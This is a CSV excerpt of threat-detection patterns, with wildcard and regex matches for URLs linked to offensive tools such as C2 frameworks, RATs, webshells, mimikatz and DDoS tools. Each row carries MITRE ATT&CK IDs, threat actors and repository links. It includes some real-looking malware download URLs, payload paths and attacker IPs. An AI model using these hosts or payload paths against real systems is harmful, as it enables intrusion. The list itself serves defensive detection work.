"*http://127.0.0.1/proxy.php*",".{0,1000}http\:\/\/127\.0\.0\.1\/proxy\.php.{0,1000}","offensive_tool_keyword","C2ReverseProxy","ReverseProxy C2 - Bring CS online without going offline","T1090 - T1090.002 - T1573 - T1573.001 - T1573.002","TA0011","N/A","N/A","C2","https://github.com/Daybr4ak/C2ReverseProxy","1","1","N/A","N/A","10","10","486","56","2023-04-26T13:16:26Z","2020-01-16T05:43:35Z","47409"
"*http://127.0.0.1/rat/*",".{0,1000}http\:\/\/127\.0\.0\.1\/rat\/.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","47410"
"*http://127.0.0.1/Renge_x64.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\/Renge_x64\.exe.{0,1000}","offensive_tool_keyword","OffensiveLua","Offensive Lua is a collection of offensive security scripts written in Lua with FFI","T1059  - T1218.011 - T1105 - T1021.002 - T1564.001 - T1112 - T1113 - T1204.002 - T1547.002","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0011","N/A","N/A","Exploitation tool","https://github.com/hackerhouse-opensource/OffensiveLua","1","1","N/A","N/A","8","2","184","25","2023-11-17T00:35:10Z","2023-10-25T17:21:13Z","47411"
"*http://127.0.0.1/shell.jsp*",".{0,1000}http\:\/\/127\.0\.0\.1\/shell\.jsp.{0,1000}","offensive_tool_keyword","Godzilla","Webshell Manager Tool that provide request proxy, server info, RCE shell, terminal execution, memory shell, port forwarding, and MSF bind/reverse shell capabilities.","T1100 - T1018 - T1059 - T1090 - T1021 - T1205 - T1105 - T1568","TA0001 - TA0002 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/BeichenDream/Godzilla","1","1","N/A","N/A","10","10","4096","551","2024-07-17T07:56:35Z","2020-08-17T17:27:56Z","47412"
"*http://127.0.0.1/wpad.dat*",".{0,1000}http\:\/\/127\.0\.0\.1\/wpad\.dat.{0,1000}","offensive_tool_keyword","potato","Potato Privilege Escalation on Windows","T1134.001 - T1068  - T1055 - T1546.015","TA0004","N/A","N/A","Privilege Escalation","https://github.com/foxglovesec/Potato","1","0","#content","N/A","7","8","721","165","2021-01-16T20:34:04Z","2016-02-09T11:28:17Z","47413"
"*http://127.0.0.1:3000/ui/panel*",".{0,1000}http\:\/\/127\.0\.0\.1\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47416"
"*http://127.0.0.1:35000*",".{0,1000}http\:\/\/127\.0\.0\.1\:35000.{0,1000}","offensive_tool_keyword","evilqr","Proof-of-concept to demonstrate dynamic QR swap phishing attacks in practice","T1566.002 - T1204.001 - T1192","TA0001 - TA0005","N/A","N/A","Phishing","https://github.com/kgretzky/evilqr","1","1","N/A","N/A","N/A","3","292","45","2024-06-18T11:27:23Z","2023-06-20T12:58:09Z","47418"
"*http://127.0.0.1:443/aaaaaaaaa*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/aaaaaaaaa.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","47422"
"*http://127.0.0.1:443/bbbbbbbbb*",".{0,1000}http\:\/\/127\.0\.0\.1\:443\/bbbbbbbbb.{0,1000}","offensive_tool_keyword","crossc2","generate CobaltStrike's cross-platform payload","T1547.001 - T1055 - T1027 - T1105 - T1047","TA0002 - TA0005 - TA0011","N/A","N/A","C2","https://github.com/gloxec/CrossC2","1","1","N/A","N/A","10","10","2383","352","2023-11-20T10:54:46Z","2020-01-16T16:39:09Z","47423"
"*http://127.0.0.1:50000/payload/upload*",".{0,1000}http\:\/\/127\.0\.0\.1\:50000\/payload\/upload.{0,1000}","offensive_tool_keyword","FruityC2","ruityC2 is a post-exploitation framework based on the deployment of agents on compromised machines","T1090 - T1572 - T1071.001","TA0010 - TA0011 - TA0008 - TA0005","N/A","MuddyWater","C2","https://github.com/xtr4nge/FruityC2","1","1","N/A","https://documents.trendmicro.com/assets/white_papers/wp_new_muddywater_findings_uncovered.pdf","10","10","208","67","2017-12-04T17:05:23Z","2017-01-11T17:27:45Z","47424"
"*http://127.0.0.1:7444*",".{0,1000}http\:\/\/127\.0\.0\.1\:7444.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1071.001 - T1071.002 - T1071.004 - T1119 - T1132 - T1030 - T1573.002 - T1008 - T1095 - T1572 - T1090.001 - T1090.002 - T1090.004","TA0011 - TA0009 - TA0010 - TA0005","N/A","Black Basta","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","N/A","10","10","3586","465","2025-04-16T18:01:45Z","2018-07-05T02:09:59Z","47425"
"*http://127.0.0.1:7474/browser/*",".{0,1000}http\:\/\/127\.0\.0\.1\:7474\/browser\/.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","neo4j default local url","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","47426"
"*http://127.0.0.1:80/file.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\:80\/file\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","47427"
"*http://127.0.0.1:8000/1.jpg*",".{0,1000}http\:\/\/127\.0\.0\.1\:8000\/1\.jpg.{0,1000}","offensive_tool_keyword","cobaltstrike","Hou Qing-Advanced AV Evasion Tool For Red Team Ops","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Hangingsword/HouQing","1","0","N/A","N/A","10","10","205","60","2021-01-14T08:38:12Z","2021-01-14T07:13:21Z","47428"
"*http://127.0.0.1:8070*",".{0,1000}http\:\/\/127\.0\.0\.1\:8070.{0,1000}","offensive_tool_keyword","WebSocketReverseShellDotNet","A .NET-based Reverse Shell, it establishes a link to the command and control for subsequent guidance.","T1071 - T1105","TA0011 - TA0002","N/A","N/A","C2","https://github.com/The-Hustler-Hattab/WebSocketReverseShellDotNet","1","1","N/A","N/A","10","10","1","0","2024-04-18T01:00:48Z","2023-12-03T03:35:24Z","47430"
"*http://127.0.0.1:8080/invoker/JMXInvokerServlet*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/invoker\/JMXInvokerServlet.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47431"
"*http://127.0.0.1:8080/shellcode.bin*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/shellcode\.bin.{0,1000}","offensive_tool_keyword","Rust-for-Malware-Development","malware development using Rust","T1055.001 - T1027 - T1204 - T1518 - T1056 - T1021 - T1587/001","TA0005 - TA0003 - TA0007 - TA0009 - TA0004 - TA0008 - TA0042","N/A","N/A","Exploitation tool","https://github.com/Whitecat18/Rust-for-Malware-Development","1","1","N/A","N/A","8","10","2123","53","2025-04-22T18:09:57Z","2024-02-12T16:55:06Z","47432"
"*http://127.0.0.1:8080/target.dll*",".{0,1000}http\:\/\/127\.0\.0\.1\:8080\/target\.dll.{0,1000}","offensive_tool_keyword","winsos-poc","A PoC demonstrating code execution via DLL Side-Loading in WinSxS binaries.","T1574.002","TA0005 - TA0004","N/A","N/A","Defense Evasion","https://github.com/thiagopeixoto/winsos-poc","1","1","N/A","N/A","10","2","111","26","2024-03-10T22:15:50Z","2024-03-10T21:35:08Z","47433"
"*http://127.0.0.1:81/test.exe*",".{0,1000}http\:\/\/127\.0\.0\.1\:81\/test\.exe.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","1","N/A","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","47434"
"*http://127.0.0.1:9090/*",".{0,1000}http\:\/\/127\.0\.0\.1\:9090\/.{0,1000}","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","N/A","Akira - Bassterlord* - BianLian - Dragonfly - FIN8 - HAFNIUM - Hive - LockBit - Magic Hound - RansomHub - Rhysida - Sandworm Team - Scattered Spider* - Threat Group-3390 - Yanluowang - menuPass - Volt Typhoon - Cinnamon Tempest - Magic Hound - DAGGER PANDA - ENERGETIC BEAR - DEV-0270 - COZY BEAR - FANCY BEAR  - EMBER BEAR - BERSERK BEAR - Dispossessor - Black Basta","Lateral Movement","https://github.com/fortra/impacket","1","1","N/A","N/A","10","10","14198","3681","2025-04-22T13:40:55Z","2015-04-15T14:04:07Z","47436"
"*http://161.35.200.18*",".{0,1000}http\:\/\/161\.35\.200\.18.{0,1000}","offensive_tool_keyword","ransomware_notes","detection patterns retrieved in ransomware notes archives","T1486","TA0040","N/A","N/A","Ransomware","https://github.com/threatlabz/ransomware_notes","1","1","N/A","N/A","10","4","354","55","2025-04-04T19:06:04Z","2022-08-01T15:14:59Z","47438"
"*http://192.168.1.179:8000/session*",".{0,1000}http\:\/\/192\.168\.1\.179\:8000\/session.{0,1000}","offensive_tool_keyword","CloakNDaggerC2","A C2 framework designed around the use of public/private RSA key pairs to sign and authenticate commands being executed. This prevents MiTM interception of calls and ensures opsec during delicate operations.","T1090 - T1090.003 - T1071 - T1071.001 - T1553 - T1553.002","TA0011 - TA0042 - TA0003","N/A","N/A","C2","https://github.com/matt-culbert/CloakNDaggerC2","1","1","N/A","N/A","10","10","17","3","2024-10-09T15:36:46Z","2023-04-28T01:58:18Z","47439"
"*http://192.168.126.130/upload.php*",".{0,1000}http\:\/\/192\.168\.126\.130\/upload\.php.{0,1000}","offensive_tool_keyword","Tsunami","another C2 framework","T1573 - T1027 - T1059 - T1071 ","TA0011 - TA0009 - TA0003 - TA0007 - TA0008","N/A","N/A","C2","https://github.com/trustedsec/The_Shelf","1","1","N/A","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","47440"
"*http://212.111.43.206:9090/pk.html*",".{0,1000}http\:\/\/212\.111\.43\.206\:9090\/pk\.html.{0,1000}","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1087 - T1110 - T1133 - T1064 - T1204","TA0007 - TA0006 - TA0003 - TA0002 - TA0005","N/A","APT33","Persistence","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","10","2222","362","2024-06-10T11:03:07Z","2016-08-18T15:05:13Z","47441"
"*http://37.120.235.188/blah.tar.gz*",".{0,1000}http\:\/\/37\.120\.235\.188\/blah\.tar\.gz.{0,1000}","offensive_tool_keyword","hackshell","Make BASH stealthy and hacker friendly with lots of bash functions","T1070.003 - T1059.004 - T1564.001 - T1070.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/hackerschoice/hackshell","1","1","N/A","N/A","9","3","251","28","2025-04-21T11:23:41Z","2024-07-16T15:56:11Z","47442"
"*http://3wifi.stascorp.com/3wifi.php*",".{0,1000}http\:\/\/3wifi\.stascorp\.com\/3wifi\.php.{0,1000}","offensive_tool_keyword","RouterScan","a penetration testing tool to maliciously scan for and brute force routers - cameras and network-attached storage devices with web interfaces","T1110","TA0006 - TA0007","RouterScan","Conti","Credential Access","https://github.com/mustafashykh/router-scan","1","1","N/A","N/A","8","1","83","44","2019-02-24T14:31:16Z","2019-02-24T07:52:22Z","47443"
"*http://adzok.net/downloadfree.php*",".{0,1000}http\:\/\/adzok\.net\/downloadfree\.php.{0,1000}","offensive_tool_keyword","Adzok","RAT tool - a variant of Adwind abused by TA","T1219 - T1105 - T1027 - T1059 - T1204","TA0011 - TA0005 - TA0002 - TA0008","N/A","Packrat","Malware","https://sourceforge.net/projects/adzok/files/Adzok_Open_v1.0.0.2.jar/download","1","1","N/A","N/A","8","8","N/A","N/A","N/A","N/A","47444"
"*http://bit.ly/1qMn59d*",".{0,1000}http\:\/\/bit\.ly\/1qMn59d.{0,1000}","offensive_tool_keyword","Arbitrium-RAT","cross-platform fully undetectable remote access trojan to control Android Windows and Linux","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","N/A","Malware","https://github.com/im-hanzou/Arbitrium-RAT","1","1","N/A","N/A","10","4","355","309","2021-01-15T23:21:13Z","2021-01-16T03:03:11Z","47448"
"*http://bit.ly/2TxpA4h*",".{0,1000}http\:\/\/bit\.ly\/2TxpA4h.{0,1000}","offensive_tool_keyword","spoofing-office-macro","PoC of a VBA macro spawning a process with a spoofed parent and command line","T1055.011 - T1127 - T1077","TA0005 - TA0003","N/A","N/A","Sniffing & Spoofing","https://github.com/christophetd/spoofing-office-macro","1","1","N/A","N/A","9","4","381","82","2020-04-28T16:23:43Z","2019-03-11T18:23:39Z","47449"
"*http://blog.gentilkiwi.com/mimikatz*",".{0,1000}http\:\/\/blog\.gentilkiwi\.com\/mimikatz.{0,1000}","offensive_tool_keyword","mimikatz","Mimikatz keywords","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore  - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Exploitation tool","https://github.com/gentilkiwi/mimikatz","1","1","N/A","https://www.virustotal.com/gui/file/5191200b2b3d20b4e970acc72cca38d318ca463a88230580a426975a6f73bb49?nocache=1","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","47450"
"*http://blog.sevagas.com/?Hacking-around-HTA-files*",".{0,1000}http\:\/\/blog\.sevagas\.com\/\?Hacking\-around\-HTA\-files.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47451"
"*http://blog.sevagas.com/?My-VBA-Bot*",".{0,1000}http\:\/\/blog\.sevagas\.com\/\?My\-VBA\-Bot.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","1","N/A","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","47452"
"*http://bshades.eu*",".{0,1000}http\:\/\/bshades\.eu.{0,1000}","offensive_tool_keyword","BlackShades","remote access trojan (RAT) used by attackers to gain unauthorized control over a victim's computer","T1012 - T1059.001 - T1071.001 - T1105 - T1113 - T1125","TA0003 - TA0005 - TA0008 - TA0010 - TA0011","N/A","N/A","Malware","https://github.com/yuankong666/Ultimate-RAT-Collection/tree/main/BlackShades","1","1","N/A","N/A","10","10","2468","431","2025-04-15T16:14:10Z","2023-09-12T00:41:11Z","47454"
"*http://ec2-52-90-251-67.compute-1.amazonaws.com/GoogleChromeAutoLaunch.exe*",".{0,1000}http\:\/\/ec2\-52\-90\-251\-67\.compute\-1\.amazonaws\.com\/GoogleChromeAutoLaunch\.exe.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","1","N/A","N/A","10","10","606","145","2024-10-29T16:56:39Z","2016-06-09T10:49:54Z","47459"
"*http://go.mail.ru/search?gay.ru.query=1&q=?abc.r&q=*",".{0,1000}http\:\/\/go\.mail\.ru\/search\?gay\.ru\.query\=1\&q\=\?abc\.r\&q\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47464"
"*http://hashcrack.com*",".{0,1000}http\:\/\/hashcrack\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47465"
"*http://hashtoolkit.com*",".{0,1000}http\:\/\/hashtoolkit\.com.{0,1000}","offensive_tool_keyword","pwcrack-framework","Password Crack Framework","T1110 - T1003 - T1059","TA0006","N/A","N/A","Credential Access","https://github.com/L-codes/pwcrack-framework","1","1","N/A","N/A","10","6","515","59","2024-02-25T13:08:56Z","2018-07-01T08:33:55Z","47466"
"*http://king-hrdevil.rhcloud.com/f5ddos3.html?v=*",".{0,1000}http\:\/\/king\-hrdevil\.rhcloud\.com\/f5ddos3\.html\?v\=.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","47467"
"*http://knight*.onion*",".{0,1000}http\:\/\/knight.{0,1000}\.onion.{0,1000}","offensive_tool_keyword","ransomware_notes","ransomware note from knight ransomware","T1486","TA0040","N/A","N/A","Ransomware","https://tria.ge/230901-c2fbqacb36","1","1","N/A","N/A","10","10","N/A","N/A","N/A","N/A","47468"
"*http://LhOsT/FiLNaMe.*",".{0,1000}http\:\/\/LhOsT\/FiLNaMe\..{0,1000}","offensive_tool_keyword","venom","venom - C2 shellcode generator/compiler/handler","T1027 - T1055 - T1071 - T1505 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","Resource Development","https://github.com/r00t-3xp10it/venom","1","1","N/A","N/A","N/A","10","1852","601","2023-12-09T00:42:22Z","2016-11-16T10:40:04Z","47469"
"*http://localhost/shell.jsp?pwd=System.out.println(*",".{0,1000}http\:\/\/localhost\/shell\.jsp\?pwd\=System\.out\.println\(.{0,1000}","offensive_tool_keyword","cheetah","a very fast brute force webshell password tool","T1110 - T1190 - T1505.003","TA0006 - TA0009","N/A","N/A","Credential Access","https://github.com/shmilylty/cheetah","1","1","N/A","N/A","10","7","630","150","2023-04-17T01:33:52Z","2017-04-15T20:03:50Z","47470"
"*http://localhost/stager.php*",".{0,1000}http\:\/\/localhost\/stager\.php.{0,1000}","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Dispossessor - APT19 - APT33 - APT41 - Avaddon - BlackByte - BlackCat - CL0P - Conti - CopyKittens - FIN10 - FIN13 - HEXANE - Hive - Indrik Spider - LazyScripter - Leviathan - LockBit - MuddyWater - PYSA - Silence - Turla - Vice Society - WIRTE - Wizard Spider - CopyKittens - INDRIK SPIDER - Black Basta","Framework","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","10","4527","608","2025-04-07T03:02:25Z","2019-08-01T04:22:31Z","47471"
"*http://localhost:3000/ui/panel*",".{0,1000}http\:\/\/localhost\:3000\/ui\/panel.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","47474"
"*http://localhost:42969/easy.aspx*",".{0,1000}http\:\/\/localhost\:42969\/easy\.aspx.{0,1000}","offensive_tool_keyword","chunk-Proxy","A backdoor installed on a web server that allows for the execution of commands and facilitates persistent access.","T1505.003 - T1059 - T1105 - T1071","TA0011 - TA0002 - TA0003","Ghost Ransomware","N/A","C2","https://github.com/BeichenDream/Chunk-Proxy","1","1","N/A","N/A","10","10","283","40","2022-05-07T04:24:50Z","2021-10-28T18:45:21Z","47475"
"*http://localhost:4430/hello*",".{0,1000}http\:\/\/localhost\:4430\/hello.{0,1000}","offensive_tool_keyword","PeriscopeC2","walmart's C2 - complete adversarial operations toolkit (C2 - stagers - agents - automated ephemeral redirectors and task runners - a complete phishing engine)","T1071 - T1105 - T1090 - T1568 - T1204 - T1566 - T1059","TA0011 - TA0010 - TA0008 - TA0002 - TA0001","N/A","N/A","C2","https://github.com/malcomvetter/Periscope","1","1","N/A","N/A","9","","N/A","","","","47476"
"*http://localhost:52935*",".{0,1000}http\:\/\/localhost\:52935.{0,1000}","offensive_tool_keyword","C3","Framework designed for red teams to create and manage custom C2 (Command and Control) channels. Unlike traditional C2 frameworks that rely on typical communication methods like HTTP/S DNS or TCP -  C3 allows for the creation of non-traditional and esoteric C2 channels using platforms like Slack Dropbox GitHub OneDrive and more.","T1071 - T1102 - T1090 - T1573 - T1048","TA0011 - TA0002 - TA0005 - TA0010","N/A","N/A","C2","https://github.com/WithSecureLabs/C3","1","1","N/A","N/A","9","10","1602","276","2023-03-04T20:32:13Z","2019-08-30T11:21:04Z","47477"
"*http://localhost:58082/broadcast?id=*",".{0,1000}http\:\/\/localhost\:58082\/broadcast\?id\=.{0,1000}","offensive_tool_keyword","cuddlephish","Weaponized Browser-in-the-Middle (BitM) for Penetration Testers","T1185 - T1185.002 - T1071 - T1071.001 - T1556 - T1556.001","TA0009 - TA0006","N/A","N/A","Sniffing & Spoofing","https://github.com/fkasler/cuddlephish","1","1","N/A","N/A","10","5","487","51","2024-11-21T17:36:55Z","2023-08-02T14:30:41Z","47478"
"*http://localhost:7474/browser/*",".{0,1000}http\:\/\/localhost\:7474\/browser\/.{0,1000}","offensive_tool_keyword","BloodHound","A Python based ingestor for BloodHound","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/fox-it/BloodHound.py","1","1","N/A","neo4j default local url","10","10","2088","343","2025-03-28T11:19:13Z","2018-02-26T14:44:20Z","47479"
